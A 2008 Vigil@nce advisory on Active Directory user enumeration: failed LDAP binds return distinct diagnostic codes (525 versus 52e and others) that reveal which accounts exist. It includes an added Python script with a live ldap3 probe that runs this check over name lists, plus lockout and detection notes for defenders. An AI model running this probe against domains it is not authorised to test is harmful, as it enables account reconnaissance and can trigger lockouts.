Vigil@nce: Windows AD, user detection via LDAP
November 2008 by Vigil@nce
SYNTHESIS
An attacker can connect to the LDAP server and determine whether user
names are valid.
Gravity: 1/4
Consequences: data reading
Provenance: intranet client
Means of attack: 1 attack
Ability of attacker: technician (2/4)
Confidence: multiple sources (3/5)
Diffusion of the vulnerable configuration: high (3/3)
Creation date: 18/11/2008
IMPACTED PRODUCTS
– Microsoft Windows 2000
– Microsoft Windows 2003
DESCRIPTION
Windows Active Directory exposes an LDAP server.
When a simple bind to this LDAP server fails, the server always returns
the generic LDAP result code 49 (invalidCredentials), but the "data"
field of the accompanying diagnostic message depends on the user:
– 525 : user does not exist
– 52e : password is incorrect
– 532 : password has expired
– etc.
An attacker can therefore test a list of user names in turn, each with
an arbitrary password, and distinguish the names that exist in the domain
(any code other than 525) from those that do not.
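The oracle described above, as an added example that is not part of the original advisory: it parses the "data" code out of an AD bind diagnostic message, treats 525 as "no such user" and every other code as proof that the account exists, and runs that classification over a candidate list. The extra codes beyond the three named in the advisory (530, 531, 533, 701, 773, 775) are the other documented AcceptSecurityContext values. The sample diagnostic messages are constructed so the script runs offline; the optional live probe assumes the third-party ldap3 library and takes the DC host and NetBIOS domain name as parameters.

```python
"""User enumeration oracle via AD LDAP bind diagnostic codes (added example)."""
import re
from typing import Callable, Dict, Iterable, Optional

# AD-specific sub-codes carried in the "data" field of the bind diagnostic
# message. The LDAP result code is 49 (invalidCredentials) in every case; only
# this data field differs. The three codes named in the advisory are included
# along with the other documented AcceptSecurityContext codes.
AD_BIND_DATA_CODES: Dict[str, str] = {
    "525": "user not found",
    "52e": "invalid credentials",
    "530": "not permitted to logon at this time",
    "531": "not permitted to logon at this workstation",
    "532": "password expired",
    "533": "account disabled",
    "701": "account expired",
    "773": "user must reset password",
    "775": "account locked out",
}

_DATA_RE = re.compile(r"\bdata\s+([0-9a-fA-F]+)\b")

# A bind probe takes a user name and returns the server's diagnostic message on
# failure, or None if the bind unexpectedly succeeded.
BindProbe = Callable[[str], Optional[str]]


def extract_data_code(diagnostic_message: Optional[str]) -> Optional[str]:
    """Pull the hex 'data NNN' code out of an AD bind diagnostic message."""
    match = _DATA_RE.search(diagnostic_message or "")
    return match.group(1).lower() if match else None


def describe(diagnostic_message: Optional[str]) -> str:
    """Human-readable meaning of the data code, for reporting."""
    code = extract_data_code(diagnostic_message)
    return AD_BIND_DATA_CODES.get(code or "", "unrecognised code")


def classify(diagnostic_message: Optional[str]) -> str:
    """Map a failed-bind diagnostic to 'nonexistent', 'exists' or 'unknown'.

    525 is the only code meaning "no such user"; every other code (52e, 532,
    533, ...) is produced only after the account was located, so it proves the
    account exists even though the bind failed.
    """
    code = extract_data_code(diagnostic_message)
    if code is None:
        return "unknown"
    return "nonexistent" if code == "525" else "exists"


def enumerate_users(usernames: Iterable[str], probe: BindProbe) -> Dict[str, str]:
    """Run the oracle over a candidate list; a successful bind also means 'exists'."""
    results: Dict[str, str] = {}
    for user in usernames:
        message = probe(user)
        results[user] = "exists" if message is None else classify(message)
    return results


# Constructed sample responses standing in for a domain controller, so the
# example runs offline. The DSID and version suffixes are illustrative only.
SAMPLE_RESPONSES: Dict[str, str] = {
    "alice": "80090308: LdapErr: DSID-0C0903A9, comment: AcceptSecurityContext error, data 52e, v1db1",
    "bob":   "80090308: LdapErr: DSID-0C0903A9, comment: AcceptSecurityContext error, data 532, v1db1",
}
NO_SUCH_USER = "80090308: LdapErr: DSID-0C0903A9, comment: AcceptSecurityContext error, data 525, v1db1"


def canned_probe(user: str) -> Optional[str]:
    """Offline stand-in for a real bind, answering from the constructed samples."""
    return SAMPLE_RESPONSES.get(user, NO_SUCH_USER)


def ldap3_probe(host: str, domain: str, password: str = "not-the-password") -> BindProbe:
    """Build a live probe with the third-party ldap3 library (assumed installed).

    Each call performs one simple bind as DOMAIN\\user with a deliberately wrong
    password and returns the diagnostic message the DC attached to result 49.
    """
    from ldap3 import SIMPLE, Connection, Server  # lazy import: optional dependency

    def probe(user: str) -> Optional[str]:
        conn = Connection(Server(host), user=f"{domain}\\{user}",
                          password=password, authentication=SIMPLE)
        try:
            if conn.bind():
                return None
            return conn.result.get("message")
        finally:
            conn.unbind()

    return probe


if __name__ == "__main__":
    for user, status in enumerate_users(["alice", "ghost", "bob"], canned_probe).items():
        print(f"{user:8s} {status:12s} ({describe(canned_probe(user))})")
```

Each probe against an existing account is a failed logon with a wrong password: it is recorded on the domain controller and counts towards the account lockout threshold, so a live run is both noisy and potentially disruptive. From the defender's side, a burst of binds from one client that fail with many different user names, most of them ending in data 525, is the signature to alert on.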
CHARACTERISTICS
Identifiers: BID-32305, VIGILANCE-VUL-8256